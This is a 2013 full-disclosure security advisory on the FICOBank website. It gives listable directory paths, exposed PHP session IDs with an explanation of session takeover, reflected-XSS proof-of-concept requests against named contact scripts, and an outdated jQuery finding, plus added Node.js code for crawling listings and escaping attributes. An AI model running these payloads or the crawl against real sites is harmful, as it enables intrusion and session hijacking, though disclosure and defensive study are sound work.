FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable
Report-Timeline:
================
23-08-2013 Advisory
Response: "Our country does not have the same laws as their own, and we do not consider the data you sent us to be security flaws.
Thank you very much."
( /ME I don't understand this response... Is it a joke? )
20-08-2013 Full Disclosure
I-VULNERABILITY
-------------------------
#Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable
#Vendor:http://www.ficobank.com / http://ficobank.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
Twitter:@secnight
II-Introduction:
=============
The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines.
Its origin is deeply rooted in the community: it was organized 36 years ago by two cooperatives and 47 samahang nayons,
which represented farmers who had limited resources and little access to banking services. From the molehill-size cooperative rural
bank it opted to be, it has grown into a mountain-high cooperative bank,
and can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012).
-------------------------
III-PROOF OF CONCEPT
====================
Attack details
--------------
Directory Listing
*****************
The web server is configured to display the list of files contained in these directories.
This is not recommended, because a directory may contain files that are never linked from
the site itself; anyone who requests the directory URL gets a listing of everything in it,
possibly exposing sensitive information. In this case the listings include _notes/ directories
(Dreamweaver design-note metadata), a scripts-old directory and, as shown later, backup copies
of the PHP contact scripts, all reachable without authentication.
Affected items
http://ficobank.com/annualreport/
/annualreport
/annualreport/_notes
/annualreport/annualreport
/Assets4Sale
/Assets4Sale/a4sale
/Assets4Sale/a4sale/_notes
/contact
/contact/_notes
/contact/html-contact-form-captcha
/contact/html-contact-form-captcha/_notes
/contact/html-contact-form-captcha/scripts
/contact/html-contact-form-captcha/scripts/_notes
/contact/scripts
/contact/scripts/_notes
/contact/scripts-old
/contact/scripts-old/_notes
/DepositProducts
/DepositProducts/_notes
/Ficonnect
/flash
/flash/_notes
/images
/images/awards
/images/images
/images/jobopening
/images/jobopening/_notes
/images/officer
/images/signature
/images/signature/_notes
/images/slides
/Leadership
/LoanProducts
/news
/news/_notes
/OtherServices
/OtherServices/_notes
/scripts
/scripts/_notes
/Stylesheet
/Stylesheet/_notes
Temporary file/directory
Affected items
http://www.ficobank.com/tmp/
/tmp
/tmp/mailError.log
/tmp/sess_secnightsessionfixation
/tmp/sess_b35e89c88df72a4c589a5a8e1a495594
/tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c
/tmp/untitled
The /tmp directory is both listable and used as the PHP session save path: the sess_* files hold the
serialised session data of live visitors, and the two hexadecimal names are real session identifiers.
Anyone who can read this listing can read those sessions and can take one over by setting the session
cookie (PHPSESSID by default) to that identifier. The sess_secnightsessionfixation entry shows that the
application also accepted an arbitrary, attacker-chosen session identifier and created a session file
for it, which is the precondition for session fixation. mailError.log is an application error log
exposed in the same way.
File Lock
The listing of the following directory also exposes editor lock files. Lock files typically record
the username of the person who has the file open, so they can be used to harvest valid usernames:
http://www.ficobank.com/DepositProducts/
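As an added example (not part of the advisory, and not code from ficobank.com), the following Node.js helpers show how findings like the ones above are triaged: recognise an autoindex page, pull the entries out of it, flag the ones that are sensitive by name (session files, logs, editor metadata, backup copies) and derive the backup file names worth requesting next to each script. The index page is constructed here in the generic "Index of" shape and is not a capture from the site; the function names and the /contact/ base path are illustrative.

```javascript
// Added example: triage helpers for a directory-listing finding. Not code from
// the advisory or from ficobank.com; the index page below is constructed to
// look like a generic autoindex response and is not a capture from the site.
const SAMPLE_INDEX = `<html><head><title>Index of /contact</title></head><body>
<h1>Index of /contact</h1>
<a href="?C=N;O=D">Name</a>
<a href="../">Parent Directory</a>
<a href="_notes/">_notes/</a>
<a href="contactus.php">contactus.php</a>
<a href="email.php">email.php</a>
<a href="email.php.bak">email.php.bak</a>
<a href="scripts-old/">scripts-old/</a>
</body></html>`;

// An autoindex page announces itself in its title; the "Parent Directory"
// link is a second, weaker signal.
function isDirectoryListing(html) {
  return /<title>\s*Index of\s/i.test(html) || /Parent Directory/.test(html);
}

// Pull the entry names out of the listing, dropping the parent link and the
// column-sort links (href="?C=..."). Entries ending in "/" are subdirectories.
function listingEntries(html) {
  const entries = [];
  for (const m of html.matchAll(/<a\s+href="([^"]+)"/gi)) {
    const href = m[1];
    if (href === "../" || href.startsWith("?")) continue;
    entries.push(href);
  }
  return entries;
}

// Suffixes developers leave behind next to a live script (the advisory found
// .bak and .BAK copies of the PHP contact scripts). Directories get none.
const BACKUP_SUFFIXES = [".bak", ".BAK", ".old", ".orig", "~"];
function backupCandidates(entry) {
  if (entry.endsWith("/")) return [];
  return BACKUP_SUFFIXES.map((s) => entry + s);
}

// Entries that matter on their own: PHP session files (sess_<id>), logs,
// backup copies and Dreamweaver _notes/ metadata directories.
function sensitiveEntries(entries) {
  return entries.filter((e) => /^sess_|\.log$|\.bak$|~$|^_notes\/$/i.test(e));
}

// The next batch of paths to request under basePath: every listed entry
// (subdirectories may be listable too) plus the backup variants of each file.
function nextRequests(basePath, html) {
  const out = [];
  for (const e of listingEntries(html)) {
    out.push(basePath + e);
    for (const b of backupCandidates(e)) out.push(basePath + b);
  }
  return out;
}
```

Run the output of nextRequests() through whatever HTTP client you use and feed each 200 response that isDirectoryListing() accepts back into the same functions; that walk is what turned the single /annualreport/ listing in this report into the full tree above.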
Cross Site Scripting
****************
Cross-site scripting (XSS) is a vulnerability that allows an attacker to deliver malicious code
(usually JavaScript) to another user through the application. Because the browser cannot tell
that the script should not be trusted, it executes it in the context of the user's session, so the
attacker can read any cookies or session tokens the browser holds for the site, steal the session
and impersonate the user, or rewrite the content of the page presented to the user.
In the findings below the input is reflected inside an HTML attribute value (single-quoted in
contactus.php and html-contact-form.php, double-quoted in samplexyz.php), so the payload closes the
quote and appends an event-handler attribute. For email.php and samplexyz.php the request path itself
is reflected into a double-quoted attribute, which is why the GET variants carry the payload as extra
path after the script name. The .bak and .BAK copies of those scripts are reachable and reflect in the
same way, so they are executed like the live scripts rather than served as inert backups.
Affected items
/contact/contactus.php
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad='
The input is reflected inside a tag parameter between single quotes.
Variant email(2)
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit
Variant Name
URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad='
The input is reflected inside a tag parameter between single quotes.
POST /contact/contactus.php
6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit
/contact/email.php
URI was set to #" onmouseover=prompt(919235) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20//
/contact/email.php.bak
URI was set to #" onmouseover=prompt(994575) //
GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20//
/contact/email.php.BAK
URI was set to #" onmouseover=prompt(924567) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20//
/contact/html-contact-form-captcha/html-contact-form.php (4)
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad='
POST /contact/html-contact-form-captcha/html-contact-form.php
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit
/contact/samplexyz.php (7)
URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad="
POST /contact/samplexyz.php
contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1
Variants contactname,email,subject
/contact/samplexyz.php.bak
URI was set to #" onmouseover=prompt(959358) //
The input is reflected inside a tag parameter between double quotes.
GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20//
/contact/samplexyz.php.BAK
URI was set to #" onmouseover=prompt(966989) //
GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20//
/contactus.php(4)
Variant email, name
email(3)
URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad='
6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit
name(1)
URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad='
6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit
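As an added example (not code from ficobank.com, whose contact scripts are PHP), the following Node.js snippet reproduces the attribute-context reflection behind the findings above with the scanner's own payloads, next to the hardened form. It renders the echoed field the naive way and with contextual encoding, then tokenizes the resulting tag the way a browser would split it into attributes, so the effect of the unescaped quote is visible without a browser. renderFieldNaive(), renderFieldSafe(), escapeAttr() and attributeNames() are names chosen here.

```javascript
// Added example, not code from ficobank.com: the contact form echoes the
// submitted field back into a quoted value attribute. Both payloads are the
// ones the scanner used against the site (single-quoted context for
// contactus.php, double-quoted context for samplexyz.php).
const SINGLE_QUOTE_PAYLOAD = "sample@email.tst' onmouseover=prompt(947854) bad='";
const DOUBLE_QUOTE_PAYLOAD = 'pdnfeddf" onmouseover=prompt(969944) bad="';

// Vulnerable rendering: the raw value is concatenated into the attribute.
// A quote in the input ends the attribute early and the rest of the payload
// becomes new attributes, including an event handler.
function renderFieldNaive(name, value, q) {
  return '<input type="text" name="' + name + '" value=' + q + value + q + ">";
}

// Hardened rendering: encode the five characters that can change context
// inside an attribute. This is what htmlspecialchars($v, ENT_QUOTES) does in
// PHP; with it the whole payload stays inside the quoted value.
function escapeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
function renderFieldSafe(name, value, q) {
  return '<input type="text" name="' + name + '" value=' + q + escapeAttr(value) + q + ">";
}

// A small attribute tokenizer (quoted values first, otherwise a bare token up
// to whitespace or ">") used only to show what a browser ends up with.
function attributeNames(tag) {
  const names = [];
  for (const m of tag.matchAll(/\s([^\s=>]+)(?:=(?:'[^']*'|"[^"]*"|[^\s>]*))?/g)) {
    names.push(m[1]);
  }
  return names;
}

// True if any attribute name is an inline event handler (onmouseover, onerror, ...).
function hasEventHandler(tag) {
  return attributeNames(tag).some((n) => /^on/i.test(n));
}
```

Note that escapeAttr() is only correct for a quoted attribute value; an unquoted attribute (value=$v) would need every non-alphanumeric character encoded, and a value placed inside a script block or a URL needs a different encoder again.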
Jquery Old Version Vulnerable
***************************
jQuery JavaScript Library v1.4.2
The pages load an old version of jQuery that is vulnerable to cross-site scripting; the problem was
fixed in jQuery 1.6.3 (CVE-2011-4969). Many sites select an element from the URL fragment with
$(location.hash). In affected versions $() decides with a regular expression whether its argument is
a selector or HTML, and any string containing "<" is taken as HTML even when it begins with "#", so a
crafted fragment injects markup (and inline event handlers) into the page.
$("#id") is a CSS selector, $("<div>") creates elements, and in affected versions $("#<div>") creates
elements too. The version banner and the 72174-byte body of the files below indicate that they are
copies of the full jQuery library served under the fade.js name, not a small fade plugin.
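As an added example (not part of the advisory, and not jQuery's own source), the following Node.js snippet reproduces the selector-versus-HTML decision that changed between the affected version and 1.6.3, so the behaviour can be tested without loading jQuery. The two regexes are the quickExpr patterns from jQuery 1.4.2 and 1.6.3; classify() and safeHashTarget() are names chosen here, and the crafted fragment is a constructed test input.

```javascript
// Added example, not from the advisory and not jQuery's own code: the two
// "quick expression" regexes jQuery's $() used to decide whether a string is
// HTML to create or a selector to look up, reproduced so the difference can be
// run without jQuery. Before 1.6.3 the HTML branch accepted any prefix before
// "<", including "#", so $(location.hash) with a crafted fragment created
// elements (and fired their inline handlers) instead of selecting one.
const quickExpr_1_4_2 = /^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/;
const quickExpr_1_6_3 = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// The branch $() takes for a string argument: "html" goes to the HTML parser,
// "id" to getElementById, "selector" to a normal CSS query (nothing created).
function classify(quickExpr, input) {
  const m = quickExpr.exec(input);
  if (!m) return "selector";
  return m[1] ? "html" : "id";
}

// What a page that scrolls to $(location.hash) should do instead: accept only
// a fragment that is a plain id token and look that id up directly.
function safeHashTarget(hash) {
  const m = /^#([\w-]+)$/.exec(hash);
  return m ? m[1] : null;
}

const crafted = "#<img src=x onerror=alert(1)>"; // constructed test input
classify(quickExpr_1_4_2, crafted); // "html": markup is created, onerror runs
classify(quickExpr_1_6_3, crafted); // "selector": no match, nothing is created
```

Upgrading jQuery removes the parsing bug, but passing an unvalidated fragment to $() stays bad practice even on current versions; the safeHashTarget() pattern (or document.getElementById on a validated id) is what to use in code that reacts to location.hash.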
Affected items
/OtherServices/fade.min.js
GET /OtherServices/fade.min.js
Response:
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
/OtherServices/jquery.fade.js
GET /OtherServices/jquery.fade.js
jquery_xss/#
Response
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174
/scripts/fade.min.js
GET /scripts/fade.min.js
Response
HTTP/1.1 200 OK
Date: Fri, 23 Aug 2013 15:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Age: 0
Connection: keep-alive
Server: YTS/1.20.28
Content-Length: 72174
/scripts/jquery.fade.js
GET /scripts/jquery.fade.js
Response
Same response headers and length as above.
IV. CREDITS
-------------------------
These vulnerabilities were discovered
by Juan Carlos García (@secnight)
Special Thanks: Perseo
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.